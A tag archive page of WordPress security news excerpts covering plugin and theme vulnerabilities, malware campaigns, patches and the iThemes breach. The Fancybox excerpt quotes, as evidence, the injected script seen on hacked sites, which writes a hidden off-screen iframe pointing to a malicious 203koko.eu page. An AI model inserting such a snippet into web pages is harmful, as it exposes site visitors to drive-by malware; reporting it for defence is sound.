Tag: security

  • Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin

    Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin

    Four hours ago, users seeking support on WordPress.org reported malware injected into their sites from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site. [html light=”true”] <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>’);}/*]]>*/</script> [/html] After working together to determine the plugins they have in common, users identified…

  • High Risk Security Vulnerability Discovered and Patched in Pagelines and Platform Themes

    High Risk Security Vulnerability Discovered and Patched in Pagelines and Platform Themes

    The PageLines and Platform drag-and-drop themes for WordPress have recently been patched for a privilege escalation vulnerability and a remote code execution issue discovered by Sucuri during a routine audit. Sucuri is classifying the vulnerabilities as high risk, with a DREAD score of 9/10, and recommends that users update their copies of the themes as…

  • Critical Git Vulnerability Patched: Update Your Git Clients Immediately

    Critical Git Vulnerability Patched: Update Your Git Clients Immediately

    Git just announced version 2.2.1, a maintenance release that includes a security fix for a critical vulnerability that affects those using Windows and Mac OS X Git clients. This update also includes new releases with the same security fix for older Git versions. GitHub confirmed that GitHub for Windows and GitHub for Mac are both…

  • 100,000+ WordPress Sites Compromised Using the Slider Revolution Security Vulnerability

    100,000+ WordPress Sites Compromised Using the Slider Revolution Security Vulnerability

    Over the weekend, the security team at Sucuri discovered that more than 100,000 WordPress sites have been hit with the SoakSoak.ru malware campaign. This campaign has resulted in more than 11,000 domains being blacklisted by Google. SoakSoak modifies the wp-includes/template-loader.php file in order to inject Javascript, which contains the malware, into every page on compromised…

  • InfiniteWP Client Plugin Releases Security Update

    InfiniteWP Client Plugin Releases Security Update

    If you use the InfiniteWP Client plugin, log into your sites and check for updates. According to Sucuri, versions under 1.3.8 are susceptible to a privilege escalation attack as well as a potential Object Injection Vulnerability. InfiniteWP Client is used to communicate to the Infinite WP service to manage WordPress sites remotely. A malicious individual…

  • WordPress 4.0.1 is a Critical Security Release that Fixes a Cross-Site Scripting Vulnerability

    WordPress 4.0.1 is a Critical Security Release that Fixes a Cross-Site Scripting Vulnerability

    WordPress core contributors released a security update today. All users who have not yet received the automatic update are encouraged to update as soon as possible. WordPress 4.0.1 is a critical security release that provides a fix for a critical cross-site scripting vulnerability, originally reported by Jouko Pynnonen on September 26th. Sites running WordPress versions…

  • Joseph Herbrandson on The Most Common Attacks Facing Today’s Websites

    Joseph Herbrandson on The Most Common Attacks Facing Today’s Websites

    Joseph Herbrandson of Sucuri published an excellent article listing the most common attacks today’s websites are facing. Herbrandson does a good job of explaining the attacks without inundating the reader with technical jargon. He also links to WordPress items that are relevant to each type of attack. I’ve spoken to Herbrandson at a few different…

  • Ben Gillbanks Announces The End of TimThumb

    Ben Gillbanks Announces The End of TimThumb

    The once popular image resizing script known as TimThumb is no longer supported according to co-creator, Ben Gillbanks. In 2011, TimThumb made headlines when a major security vulnerability was discovered and used to hack into several websites. The exploit that was found was a bug with the external image resize functionality and the fact it…

  • WPWeekly Episode 163 – Interview With Andrea Middleton of WordCamp Central

    WPWeekly Episode 163 – Interview With Andrea Middleton of WordCamp Central

    In this episode, Marcus Couch and I are joined by Andrea Middleton who manages WordCamp Central. She tells us what it means to be a “dot organizer” within Automattic and what her day to day duties are managing WordCamp Central. We discuss whether the WordCamp Guidelines allow for differentiation between WordCamps. Middleton explains the various…

  • Ryan Hellyer’s AWS Nightmare: Leaked Access Keys Result in a $6,000 Bill Overnight

    Ryan Hellyer’s AWS Nightmare: Leaked Access Keys Result in a $6,000 Bill Overnight

    WordPress developer Ryan Hellyer had always wanted to open source his website. As a strong supporter of open source software and an avid plugin developer, he enjoys sharing his code and learning from others. This desire led him to put his site up on GitHub one evening, not knowing that he would wake to find…

  • iThemes Confirms it Stored Customer Passwords in Clear-Text

    iThemes Confirms it Stored Customer Passwords in Clear-Text

    The CEO of iThemes, Cory Miller, published a second update concerning the security breach that occurred on Tuesday. After news of the breach, customers were left wondering whether or not their passwords were stored in clear-text. The latest update confirms that passwords were in fact stored in clear-text and affected approximately 60,000 customers. There is…

  • iThemes Suffers Security Breach, Customers Urged To Reset Passwords

    iThemes Suffers Security Breach, Customers Urged To Reset Passwords

    iThemes published details on a security breach that took place earlier today. According to the announcement, after noticing suspicious activity, they noticed a signification attack on their membership database. iThemes urges all customers to reset their passwords immediately. To protect accounts from any unauthorized access, iThemes has temporarily reset all user passwords. To regain access…

  • iThemes Security Now Has Brute Force Login Protection

    iThemes Security Now Has Brute Force Login Protection

    iThemes announced Brute Force Login Protection has been added to the latest version of iThemes Security. The new feature enables users to protect their sites either locally or by activating a network wide setting. Local brute force protection looks only at attempts to access your site and bans users per the lockout rules specified locally.…

  • Founder Of ManageWP Publishes Open Letter on Security to The WordPress Community

    Founder Of ManageWP Publishes Open Letter on Security to The WordPress Community

    The founder of ManageWP, Vladimir Prelovac, has published an open letter addressed to the WordPress community on the topic of security. In the letter, he cites the third-party ecosystem surrounding WordPress is not only its biggest strength, but also its biggest weakness. He suggests a three-point plan to help mitigate security issues in themes and…